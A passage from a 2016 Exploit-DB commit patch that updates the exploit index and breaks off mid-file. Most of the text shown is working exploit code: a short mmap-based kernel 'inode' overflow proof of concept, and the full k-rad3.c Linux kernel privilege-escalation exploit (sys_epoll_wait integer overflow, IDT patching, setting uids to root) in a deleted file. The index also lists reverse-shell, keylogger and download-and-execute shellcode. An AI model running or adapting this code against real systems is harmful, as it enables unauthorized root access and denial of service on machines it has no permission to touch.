From 38038a71288606a7e8d4fbe6916b1b44b49a5c51 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 24 Nov 2016 05:01:19 +0000 Subject: [PATCH] DB: 2016-11-24 6 new exploits Linux Kernel 2.6.32-642 / 3.16.0-4 - 'inode' Integer Overflow UCanCode - Multiple Vulnerabilities Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1) Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2) Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1) Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2) Microsoft Windows Server 2008/2012 - LDAP RootDSE Netlogon Denial of Service (PoC) Microsoft Windows Server 2008/2012 - LDAP RootDSE Netlogon Denial of Service Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Validator (PoC) (1) Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Validator (PoC) (2) Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (1) Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (2) Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation (3) Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Validator (PoC) (1) Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Privilege Escalation (2) Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Validator (PoC) Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Privilege Escalation Linux Kernel 2.6.9 / 2.6.11 (RHEL4) - 'k-rad3.c' (CPL 0) Privilege Escalation Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow Privilege Escalation Linux Kernel 2.6.30 <= 2.6.30.1 / SELinux (RHEL5) - Privilege Escalation Linux Kernel 2.6.30 < 2.6.30.1 / SELinux (RHEL 5) - Privilege Escalation Linux Kernel 2.6.9 / 2.6.11 (RHEL4) - SYS_EPoll_Wait Local Integer Overflow Privilege Escalation (2) Linux Kernel 2.6.18 - 'move_pages()' Information Leak Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak Linux Kenrel 2.6.10 < 2.6.31.5 - 'pipe.c' Privilege Escalation Windows x64 - Download & Execute Shellcode (358 bytes) --- files.csv | 27 +- platforms/linux/dos/40819.c | 41 ++ platforms/linux/local/141.c | 3 +- platforms/linux/local/142.c | 3 +- platforms/linux/local/25203.c | 740 ------------------------- platforms/linux/local/40810.c | 323 +++++++++++ platforms/linux/local/40811.c | 132 +++++ platforms/linux/local/40812.c | 468 ++++++++++++++++ platforms/linux/local/744.c | 4 + platforms/linux/local/778.c | 4 + platforms/win_x86-64/shellcode/40821.c | 332 +++++++++++ platforms/windows/dos/40820.txt | 329 +++++++++++ 12 files changed, 1653 insertions(+), 753 deletions(-) create mode 100755 platforms/linux/dos/40819.c delete mode 100755 platforms/linux/local/25203.c create mode 100755 platforms/linux/local/40810.c create mode 100755 platforms/linux/local/40811.c create mode 100755 platforms/linux/local/40812.c create mode 100755 platforms/win_x86-64/shellcode/40821.c create mode 100755 platforms/windows/dos/40820.txt diff --git a/files.csv b/files.csv index 347ea6664..52428e9c9 100755 --- a/files.csv +++ b/files.csv @@ -3323,6 +3323,8 @@ id,file,description,date,author,platform,type,port 25164,platforms/linux/dos/25164.txt,"Gaim 1.1.3 - File Download Denial of Service",2005-02-25,"Randall Perry",linux,dos,0 25165,platforms/multiple/dos/25165.c,"Stormy Studios KNet 1.x - Remote Buffer Overflow",2005-02-26,Expanders,multiple,dos,0 25171,platforms/multiple/dos/25171.txt,"MercurySteam Scrapland Game Server 1.0 - Remote Denial of Service",2005-02-28,"Luigi Auriemma",multiple,dos,0 +40819,platforms/linux/dos/40819.c,"Linux Kernel 2.6.32-642 / 3.16.0-4 - 'inode' Integer Overflow",2016-11-23,"Todor Donev",linux,dos,0 +40820,platforms/windows/dos/40820.txt,"UCanCode - Multiple Vulnerabilities",2016-11-23,shinnai,windows,dos,0 25218,platforms/windows/dos/25218.pl,"PlatinumFTPServer 1.0.18 - Multiple Malformed User Name Connection Denial of Service",2005-03-05,ports,windows,dos,0 25219,platforms/windows/dos/25219.txt,"Spinworks Application Server 3.0 - Remote Denial of Service",2005-03-15,dr_insane,windows,dos,0 25231,platforms/windows/dos/25231.txt,"Microsoft Windows 2000/2003/XP - Graphical Device Interface Library Denial of Service",2005-03-17,"Hongzhen Zhou",windows,dos,0 @@ -4015,8 +4017,8 @@ id,file,description,date,author,platform,type,port 31957,platforms/multiple/dos/31957.txt,"World in Conflict 1.008 - Null Pointer Remote Denial of Service",2008-06-23,"Luigi Auriemma",multiple,dos,0 31958,platforms/multiple/dos/31958.txt,"SunAge 1.8.1 - Multiple Denial of Service Vulnerabilities",2008-06-23,"Luigi Auriemma",multiple,dos,0 31964,platforms/windows/dos/31964.txt,"5th street - 'dx8render.dll' Format String",2008-06-25,superkhung,windows,dos,0 -31965,platforms/linux/dos/31965.c,"Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1)",2008-06-25,"Alexei Dobryanov",linux,dos,0 -31966,platforms/linux/dos/31966.c,"Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2)",2008-06-25,"Alexei Dobryanov",linux,dos,0 +31965,platforms/linux/dos/31965.c,"Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1)",2008-06-25,"Alexei Dobryanov",linux,dos,0 +31966,platforms/linux/dos/31966.c,"Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2)",2008-06-25,"Alexei Dobryanov",linux,dos,0 31968,platforms/linux/dos/31968.txt,"GNOME Rhythmbox 0.11.5 - Malformed Playlist File Denial of Service",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0 32095,platforms/linux/dos/32095.pl,"Asterisk 1.6 IAX - 'POKE' Requests Remote Denial of Service",2008-07-21,"Blake Cornell",linux,dos,0 31979,platforms/linux/dos/31979.html,"GNOME Evolution 2.22.2 - 'html_engine_get_view_width()' Denial of Service",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0 @@ -5254,7 +5256,7 @@ id,file,description,date,author,platform,type,port 40696,platforms/linux/dos/40696.c,"Memcached 1.4.33 - PoC (2)",2016-11-01,"p0wd3r / dawu",linux,dos,0 40697,platforms/linux/dos/40697.c,"Memcached 1.4.33 - PoC (3)",2016-11-01,"p0wd3r / dawu",linux,dos,0 40699,platforms/windows/dos/40699.txt,"Axessh 4.2 - Denial of Service",2016-11-03,hyp3rlinx,windows,dos,0 -40703,platforms/windows/dos/40703.pl,"Microsoft Windows Server 2008/2012 - LDAP RootDSE Netlogon Denial of Service (PoC)",2016-11-08,"Todor Donev",windows,dos,0 +40703,platforms/windows/dos/40703.pl,"Microsoft Windows Server 2008/2012 - LDAP RootDSE Netlogon Denial of Service",2016-11-08,"Todor Donev",windows,dos,0 40722,platforms/windows/dos/40722.html,"Microsoft Internet Explorer 9 MSHTML - CPtsTextParaclient::CountApes Out-of-Bounds Read",2016-11-07,Skylined,windows,dos,0 40731,platforms/linux/dos/40731.c,"Linux Kernel - TCP Related Read Use-After-Free",2016-08-18,"Marco Grassi",linux,dos,0 40744,platforms/windows/dos/40744.txt,"Microsoft Windows - LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137)",2016-11-09,"laurent gaffie",windows,dos,0 @@ -5304,13 +5306,13 @@ id,file,description,date,author,platform,type,port 131,platforms/linux/local/131.c,"Linux Kernel 2.4.22 - 'do_brk()' Privilege Escalation",2003-12-05,"Wojciech Purczynski",linux,local,0 134,platforms/hp-ux/local/134.c,"HP-UX B11.11 - /usr/bin/ct Local Format String Privilege Escalation",2003-12-16,watercloud,hp-ux,local,0 140,platforms/linux/local/140.c,"XSOK 1.02 - '-xsokdir' Local Buffer Overflow Game Exploit",2004-01-02,c0wboy,linux,local,0 -141,platforms/linux/local/141.c,"Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Validator (PoC) (1)",2004-01-06,"Christophe Devine",linux,local,0 -142,platforms/linux/local/142.c,"Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Validator (PoC) (2)",2004-01-07,"Christophe Devine",linux,local,0 +141,platforms/linux/local/141.c,"Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (1)",2004-01-06,"Christophe Devine",linux,local,0 +142,platforms/linux/local/142.c,"Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (2)",2004-01-07,"Christophe Devine",linux,local,0 144,platforms/linux/local/144.c,"SuSE Linux 9.0 - YaST config Skribt Local Exploit",2004-01-15,l0om,linux,local,0 -145,platforms/linux/local/145.c,"Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation (3)",2004-01-15,"Paul Starzetz",linux,local,0 +145,platforms/linux/local/145.c,"Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation",2004-01-15,"Paul Starzetz",linux,local,0 152,platforms/linux/local/152.c,"rsync 2.5.7 - Local Stack Overflow Privilege Escalation",2004-02-13,"Abhisek Datta",linux,local,0 -154,platforms/linux/local/154.c,"Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Validator (PoC) (1)",2004-02-18,"Christophe Devine",linux,local,0 -160,platforms/linux/local/160.c,"Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Privilege Escalation (2)",2004-03-01,"Paul Starzetz",linux,local,0 +154,platforms/linux/local/154.c,"Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Validator (PoC)",2004-02-18,"Christophe Devine",linux,local,0 +160,platforms/linux/local/160.c,"Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Privilege Escalation",2004-03-01,"Paul Starzetz",linux,local,0 172,platforms/windows/local/172.c,"FirstClass Desktop 7.1 - Buffer Overflow",2004-04-07,I2S-LaB,windows,local,0 178,platforms/linux/local/178.c,"LBL Traceroute - Privilege Escalation",2000-11-15,"Michel Kaempf",linux,local,0 180,platforms/linux/local/180.c,"GnomeHack 1.0.5 - Local Buffer Overflow",2000-11-15,vade79,linux,local,0 @@ -5548,7 +5550,7 @@ id,file,description,date,author,platform,type,port 1316,platforms/linux/local/1316.pl,"Veritas Storage Foundation 4.0 - VCSI18N_LANG Local Overflow",2005-11-12,"Kevin Finisterre",linux,local,0 1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 (x86) - (phgrafx) Local Buffer Overflow",2005-11-30,"p. minervini",qnx,local,0 1360,platforms/solaris/local/1360.c,"Appfluent Database IDS < 2.1.0.103 - (Env Variable) Local Exploit",2005-12-07,c0ntex,solaris,local,0 -1397,platforms/linux/local/1397.c,"Linux Kernel 2.6.9 / 2.6.11 (RHEL4) - 'k-rad3.c' (CPL 0) Privilege Escalation",2005-12-30,alert7,linux,local,0 +1397,platforms/linux/local/1397.c,"Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow Privilege Escalation",2005-12-30,alert7,linux,local,0 1402,platforms/sco/local/1402.c,"SCO OpenServer 5.0.7 - (termsh) Privilege Escalation",2006-01-03,prdelka,sco,local,0 1403,platforms/windows/local/1403.c,"WinRAR 3.30 - Long Filename Buffer Overflow (1)",2006-01-04,K4P0,windows,local,0 1404,platforms/windows/local/1404.c,"WinRAR 3.30 - Long Filename Buffer Overflow (2)",2006-01-04,c0d3r,windows,local,0 @@ -6068,7 +6070,7 @@ id,file,description,date,author,platform,type,port 9177,platforms/windows/local/9177.pl,"Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Universal Buffer Overflow",2009-07-16,Crazy_Hacker,windows,local,0 9186,platforms/windows/local/9186.pl,"Easy RM to MP3 Converter - '.m3u' Universal Stack Overflow",2009-07-17,Stack,windows,local,0 9190,platforms/windows/local/9190.pl,"htmldoc 1.8.27.1 - '.html' Universal Stack Overflow",2009-07-17,ksa04,windows,local,0 -9191,platforms/linux/local/9191.txt,"Linux Kernel 2.6.30 <= 2.6.30.1 / SELinux (RHEL5) - Privilege Escalation",2009-07-17,spender,linux,local,0 +9191,platforms/linux/local/9191.txt,"Linux Kernel 2.6.30 < 2.6.30.1 / SELinux (RHEL 5) - Privilege Escalation",2009-07-17,spender,linux,local,0 9199,platforms/windows/local/9199.txt,"Adobe 9.x Related Service - (getPlus_HelperSvc.exe) Privilege Escalation",2009-07-20,Nine:Situations:Group,windows,local,0 9207,platforms/linux/local/9207.sh,"PulseAudio setuid - Privilege Escalation",2009-07-20,anonymous,linux,local,0 9208,platforms/linux/local/9208.txt,"PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Privilege Escalation",2009-07-20,anonymous,linux,local,0 @@ -7865,7 +7867,6 @@ id,file,description,date,author,platform,type,port 25134,platforms/linux/local/25134.c,"sudo 1.8.0 < 1.8.3p1 (sudo_debug) - Privilege Escalation + glibc FORTIFY_SOURCE Bypass",2013-05-01,aeon,linux,local,0 25141,platforms/windows/local/25141.rb,"AudioCoder 0.8.18 - Buffer Overflow (SEH)",2013-05-02,metacom,windows,local,0 25202,platforms/linux/local/25202.c,"Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Local Integer Overflow Privilege Escalation (1)",2005-03-09,sd,linux,local,0 -25203,platforms/linux/local/25203.c,"Linux Kernel 2.6.9 / 2.6.11 (RHEL4) - SYS_EPoll_Wait Local Integer Overflow Privilege Escalation (2)",2005-03-09,alert7,linux,local,0 25204,platforms/windows/local/25204.py,"ABBS Audio Media Player 3.1 - '.lst' Buffer Overflow",2013-05-04,"Julien Ahrens",windows,local,0 25256,platforms/osx/local/25256.c,"Apple Mac OSX 10.3.x - Multiple Vulnerabilities",2005-03-21,V9,osx,local,0 25288,platforms/linux/local/25288.c,"Linux Kernel 2.4.x / 2.6.x - BlueTooth Signed Buffer Index Privilege Escalation (2)",2005-04-08,qobaiashi,linux,local,0 @@ -8653,6 +8654,9 @@ id,file,description,date,author,platform,type,port 40788,platforms/linux/local/40788.txt,"Palo Alto Networks PanOS root_trace - Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0 40789,platforms/linux/local/40789.txt,"Palo Alto Networks PanOS root_reboot - Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0 40807,platforms/windows/local/40807.txt,"Huawei UTPS - Unquoted Service Path Privilege Escalation",2016-11-22,"Dhruv Shah",windows,local,0 +40810,platforms/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,linux,local,0 +40811,platforms/linux/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,linux,local,0 +40812,platforms/linux/local/40812.c,"Linux Kenrel 2.6.10 < 2.6.31.5 - 'pipe.c' Privilege Escalation",2013-12-16,spender,linux,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -15689,6 +15693,7 @@ id,file,description,date,author,platform,type,port 40560,platforms/win_x86/shellcode/40560.asm,"Windows x86 - Keylogger Reverse UDP Shellcode (493 bytes)",2016-10-17,Fugu,win_x86,shellcode,0 40781,platforms/win_x86-64/shellcode/40781.c,"Windows x64 - Reverse Shell TCP Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 40808,platforms/lin_x86-64/shellcode/40808.c,"Linux/x86-64 - /bin/sh -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",lin_x86-64,shellcode,0 +40821,platforms/win_x86-64/shellcode/40821.c,"Windows x64 - Download & Execute Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 diff --git a/platforms/linux/dos/40819.c b/platforms/linux/dos/40819.c new file mode 100755 index 000000000..ee77b04b3 --- /dev/null +++ b/platforms/linux/dos/40819.c @@ -0,0 +1,41 @@ +/* Linux Kernel 2.6.32-642 / 3.16.0-4 'inode' Integer Overflow PoC + + The inode is a data structure in a Unix-style file system which describes a filesystem + object such as a file or a directory. Each inode stores the attributes and disk block + locations of the object's data. Filesystem object attributes may include metadata, as + well as owner and permission data. + + INODE can be overflowed by mapping a single file too many times, allowing for a local + user to possibly gain root access. + + Disclaimer: + This or previous program is for Educational purpose ONLY. Do not use it without permission. + The usual disclaimer applies, especially the fact that Todor Donev is not liable for any + damages caused by direct or indirect use of the information or functionality provided + by these programs. The author or any Internet provider bears NO responsibility for content + or misuse of these programs or any derivatives thereof. By using these programs you accept + the fac that any damage (dataloss, system crash, system compromise, etc.) caused by the use + of these programs is not Todor Donev's responsibility. + + Thanks to Maya Hristova and all friends. + + Suggestions,comments and job offers are welcome! + + Copyright 2016 (c) Todor Donev + Varna, Bulgaria + todor.donev@gmail.com + https://www.ethical-hacker.org/ + https://www.facebook.com/ethicalhackerorg + http://pastebin.com/u/hackerscommunity + +*/ +#include +#include +#include +void main(){ +int fd, i; +fd = open("/dev/zero", O_RDONLY); +for(i = 0; i < 26999; i++){ +mmap((char*)0x00000000 + (0x10000 * i), 1, PROT_READ, MAP_SHARED | MAP_FIXED, fd, 0); +} +} \ No newline at end of file diff --git a/platforms/linux/local/141.c b/platforms/linux/local/141.c index a53905455..f50e8268b 100755 --- a/platforms/linux/local/141.c +++ b/platforms/linux/local/141.c @@ -1,5 +1,6 @@ /* - * EDB Note: This will just "test" the vulnerability. A exploit version can be found here ~ https://www.exploit-db.com/exploits/145/ + * EDB Note: This will just "test" the vulnerability. +* EDB Note: An exploit version can be found here ~ https://www.exploit-db.com/exploits/145/ */ /* diff --git a/platforms/linux/local/142.c b/platforms/linux/local/142.c index 6f4d7cfae..bc9e67af1 100755 --- a/platforms/linux/local/142.c +++ b/platforms/linux/local/142.c @@ -1,5 +1,6 @@ /* - * EDB Note: This will just "test" the vulnerability. A exploit version can be found here ~ https://www.exploit-db.com/exploits/145/ + * EDB Note: This will just "test" the vulnerability. +* EDB Note: An exploit version can be found here ~ https://www.exploit-db.com/exploits/145/ */ /* diff --git a/platforms/linux/local/25203.c b/platforms/linux/local/25203.c deleted file mode 100755 index 8b57f5d0d..000000000 --- a/platforms/linux/local/25203.c +++ /dev/null @@ -1,740 +0,0 @@ -/* -source: http://www.securityfocus.com/bid/12763/info - -A Local integer overflow vulnerability affects the Linux kernel. This issue is due to a failure of the affected kernel to properly handle user-supplied size values. - -An attacker may leverage this issue to overwrite low kernel memory. This may potentially facilitate privilege escalation. -*/ - -/* -* k-rad3.c - linux 2.6.11 and below CPL 0 kernel local exploit v3 -* Discovered and original exploit coded Jan 2005 by sd -* -********************************************************************* -* -* Modified 2005/9 by alert7 -* XFOCUS Security Team http://www.xfocus.org -* -* gcc -o k-rad3 k-rad3.c -static -O2 -* -* tested succeed : -* on default installed RHEL4(2.6.9-5.EL and 2.6.9-5.ELsmp) -* 2.6.9-5.EL ./k-rad3 -p 2 -* 2.6.9-5.ELsmp ./k-rad3 -a -p 7 -* on default installed maglic linux 1.2 -* MagicLinux 2.6.9 #1 ./k-rad3 -t 1 -p 2 -* -* thank watercloud tested maglic linux 1.2 -* thank eist provide RHEL4 to test -* thank sd share his stuff. -* thank xfocus & xfocus's firends -* -* -* TODO: -* CASE 1: use stack > 0xc0000000 -* CASE 2: CONFIG_X86_PAE define ,but cpu flag no pse -* -*[alert7@MagicLinux ~]$ ./k-rad3 -h -*[ k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit ] -*[ Discovered Jan 2005 by sd ] -*[ Modified 2005/9 by alert7 ] -* -*Usage: ./k-rad3 -* -s forced cpu flag pse -* -a define CONFIG_X86_PAE,default none -* -e have two kernel code,default 0 -* -p alloc pages(4k) ,default 1. Increase from 1 to 7 -* The higher number the more likely it will crash -* -t default 0 -* 0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192 -* -*[alert7@MagicLinux ~]$ ./k-rad3 -t 1 -p 2 -*[ k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit ] -*[ Discovered Jan 2005 by sd ] -*[ Modified 2005/9 by alert7 ] -*[+] try open /proc/cpuinfo .. ok!! -*[+] find cpu flag pse in /proc/cpuinfo -*[+] CONFIG_X86_PAE :none -*[+] Cpu flag: pse ok -*[+] Exploit Way : 0 -*[+] Use 2 pages (one page is 4K ),rewrite 0xc0000000--(0xc0002000 + n) -*[+] thread_size 1 (0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192 -*[+] idtr.base 0xc0461000 ,base 0xc0000000 -*[+] kwrite base 0xc0000000, buf 0xbffed750,num 8196 -*[+] idt[0x7f] addr 0xffc003f8 -*[+] j00 1u(k7 k1d! -*[root@k-rad3 ~] #id -*uid=0(root) gid=0(root) groups=500(alert7) -* -* -* Linux Kernel <= 2.6.11 "sys_epoll_wait" Local integer overflow Exploit -* -* "it is possible to partially overwrite low kernel ( >= 2.6 <= 2.6.11) -* memory due to integer overflow in sys_epoll_wait and misuse of -* __put_user in ep_send_events" -* Georgi Guninski: http://seclists.org/lists/fulldisclosure/2005/Mar/0293.html -* -********************************************************************* -* -* -* In memory of pwned.c (uselib) -* -* - Redistributions of source code is not permitted. -* - Redistributions in the binary form is not permitted. -* - Redistributions of the above copyright notice, this list of conditions, -* and the following disclaimer is permitted. -* - By proceeding to a Redistribution and under any form of the Program -* the Distributor is granting ownership of his Resources without -* limitations to the copyright holder(s). -* -* -* Since we already owned everyone, theres no point keeping this private -* anymore. -* -* http://seclists.org/lists/fulldisclosure/2005/Mar/0293.html -* -* Thanks to our internet hero georgi guninski for being such incredible -* whitehat disclosing one of the most reliable kernel bugs. -* You saved the world, man, we owe you one! -* -* This version is somewhat broken, but skilled reader will get an idea. -* Well, at least let the scriptkids have fun for a while. -* -* Thanks to all who helped me developing/testing this, you know who you are, -* and especially to my gf for guidance while coding this. -* -*/ - -#define _GNU_SOURCE - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#ifndef __USE_GNU - #define __USE_GNU -#endif -#include -#include -#include -#include - -/** - * Relationship Variables - * - * 1: CONFIG_X86_PAE - * see /lib/modules/`uname -r`/build/.config - * 1.1: pse - * 2: THREAD_SIZE - * see include/asm/thread_info.h THREAD_SIZE define - */ - - -#define MAP (0xfffff000 - (1023*4096)) -#define MAP_PAE (0xfffff000 - (511*4096)) -#define MKPTE(addr) ((addr & (~4095)) | 0x27) -#define MKPMD(x) (0x1e3|0x004) - -//////////////////////////////////////////////// - -#define KRADPS1 "k-rad3" - -#define kB * 1024 -#define MB * 1024 kB -#define GB * 1024 MB - -#define KRS "\033[1;30m[ \033[1;37m" -#define KRE "\033[1;30m ]\033[0m" -#define KRAD "\033[1;30m[\033[1;37m*\033[1;30m]\033[0m " -#define KRADP "\033[1;30m[\033[1;37m+\033[1;30m]\033[0m " -#define KRADM "\033[1;30m[\033[1;37m-\033[1;30m]\033[0m " - -#define SET_IDT_GATE(idt,ring,s,addr) \ - (idt).off1 = addr & 0xffff; \ - (idt).off2 = addr >> 16; \ - (idt).sel = s; \ - (idt).none = 0; \ - (idt).flags = 0x8E | (ring << 5); - -//config val -static int havepse = 0; -static int definePAE = 0; -static int exploitway = 0; -static int npages = 1; -static int thread_size = 0; - - -static uid_t uid = 0; -static unsigned long long *clear1; -static char * progargv0; - -struct idtr { - unsigned short limit; - unsigned int base; -} __attribute__ ((packed)); - -struct idt { - unsigned short off1; - unsigned short sel; - unsigned char none,flags; - unsigned short off2; -} __attribute__ ((packed)); - - - -#define __syscall_return(type, res) \ -do { \ - if ((unsigned long)(res) >= (unsigned long)(-125)) { \ - errno = -(res); \ - res = -1; \ - } \ - return (type) (res); \ -} while (0) - - -#define _capget_macro(type,name,type1,arg1,type2,arg2) \ - type name(type1 arg1,type2 arg2) \ - { \ - long __res; \ - __asm__ volatile ( "int $0x80" \ - : "=a" (__res) \ - : "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2))); \ - __syscall_return(type,__res); \ - } - -static inline _capget_macro(int,capget,void *,a,void *,b); - -static int THREAD_SIZE_MASK =(-4096); - - -static void -fatal(const char *message) -{ - system("uname -a"); - printf("[-] %s\n",message); - exit(1); -} - -void kernel(unsigned * task) -{ - unsigned * addr = task; - /* looking for uids */ - - *clear1 = 0; - - while (addr[0] != uid || addr[1] != uid || - addr[2] != uid || addr[3] != uid - ) - addr++; - - addr[0] = addr[1] = addr[2] = addr[3] = 0; /* set uids */ - addr[4] = addr[5] = addr[6] = addr[7] = 0; /* set gids */ - -} - -void kcode(void); -void __kcode(void) -{ - asm( - "kcode: \n" - "cld \n" - " pusha \n" - " pushl %es \n" - " pushl %ds \n" - " movl %ss,%edx \n" - " movl %edx,%es \n" - " movl %edx,%ds \n"); - __asm__("movl %0 ,%%eax" ::"m"(THREAD_SIZE_MASK) ); - asm( - " andl %esp,%eax \n" - " pushl (%eax) \n" - " call kernel \n" - " addl $4, %esp \n" - " popl %ds \n" - " popl %es \n" - " popa \n" - " cli \n" - " iret \n" - ); -} - - -void raise_cap(unsigned long *ts) -{ -/* must be on lower addresses because of kernel arg check :) */ -static struct __user_cap_header_struct head; -static struct __user_cap_data_struct data; -static struct __user_cap_data_struct n; - -int i; - -*clear1 = 0; -head.version = 0x19980330; -head.pid = 0; -capget(&head, &data); -/* scan the thread_struct */ -for (i = 0; i < 512; i++, ts++) -{ - /* is it capabilities block? */ - if ( (ts[0] == data.effective) && - (ts[1] == data.inheritable) && - (ts[2] == data.permitted)) - { - /* set effective cap to some val */ - ts[0] = 0x12341234; - capget(&head, &n); - /* and test if it has changed */ - if (n.effective == ts[0]) - { - /* if so, we're in :) */ - ts[0] = ts[1] = ts[2] = 0xffffffff; - return; - } - /* otherwise fix back the stuff - (if we've not crashed already :) */ - ts[0] = data.effective; - } -} -return; -} - - -void stub(void); -void __stub(void) -{ - asm ( - "stub:;" - " pusha;" - ); - __asm__("movl %0 ,%%eax" ::"m"(THREAD_SIZE_MASK) ); - asm( - " and %esp, %eax;" - " pushl (%eax);" - " call raise_cap;" - " pop %eax;" - " popa;" - " iret;" - ); - -} - - -/* write to kernel from buf, num bytes */ -static int -kwrite(unsigned base, char *buf, int num) -{ -#define DIV 256 -#define RES 4 - -int efd, c, i, fd; -int pi[2]; -struct epoll_event ev; -int *stab; -unsigned long ptr; -int count; -unsigned magic = 0xffffffff / 12 + 1; - - printf("[+] kwrite base %p, buf %p,num %d\n", (void *)base,buf,num); - /* initialize epoll */ - efd = epoll_create(4096); - if (efd < 0) - return -1; - - ev.events = EPOLLIN|EPOLLOUT|EPOLLPRI|EPOLLERR|EPOLLHUP; - - /* 12 bytes per fd + one more to be safely in stack space */ - count = (num+11)/12+RES; - - /* desc array */ - stab = alloca((count+DIV-1)/DIV*sizeof(int)); - - for (i = 0; i < ((count+DIV-1)/DIV)+1; i++) - { - - if (socketpair(AF_UNIX, SOCK_DGRAM, 0, pi) < 0) - return -1; - - send(pi[0], "a", 1, 0); - stab[i] = pi[1]; - } - - /* highest fd and first descriptor */ - fd = pi[1]; - /* we've to allocate this separately because we need to have - it's fd preserved - using this we'll be writing actual bytes */ - epoll_ctl(efd, EPOLL_CTL_ADD, fd, &ev); - //printf("EPOLL_CTL_ADD count %u\n",count); - for (i = 0, c = 0; i < (count-1); i++) - { - int n; - n = dup2(stab[i/DIV], fd+2+(i % DIV)); - if (n < 0) - return -1; - epoll_ctl(efd, EPOLL_CTL_ADD, n, &ev); - close(n); - } - - /* in 'n' we've the latest fd we're using to write data */ - for (i = 0; i < ((num+7)/8); i++) - { - /* data being written from end */ - memcpy(&ev.data, buf + num - 8 - i * 8, 8); - epoll_ctl(efd, EPOLL_CTL_MOD, fd, &ev); - - /* the actual kernel magic */ - ptr = (base + num - (i*8)) - (count * 12); - struct epoll_event *events =(struct epoll_event *)ptr; - //printf("epoll_wait verify_area(%p,%p) addr %p %p\n",ptr,magic* sizeof(struct epoll_event) ,&events[0].events,magic); - int iret =epoll_wait(efd, (void *) ptr, magic, 31337); - if (iret ==-1) - { - perror("epoll_wait"); - fatal("This kernel not vulnerability!!!"); - - } - /* don't ask why (rotten rb-trees) :) */ - if (i) - { - //printf("epoll_wait verify_area(%p,%p) %p\n",ptr,magic* sizeof(struct epoll_event) ,magic); - iret = epoll_wait(efd, (void *)ptr, magic, 31337); - if (iret ==-1) - { - perror("epoll_wait"); - fatal("This kernel not vulnerability!!!"); - - } - - } - } - - close(efd); - for (i = 3; i <= fd; i++) - close(i); - - return 0; - -} - -/* real-mode interrupt table fixup - point all interrupts to iret. 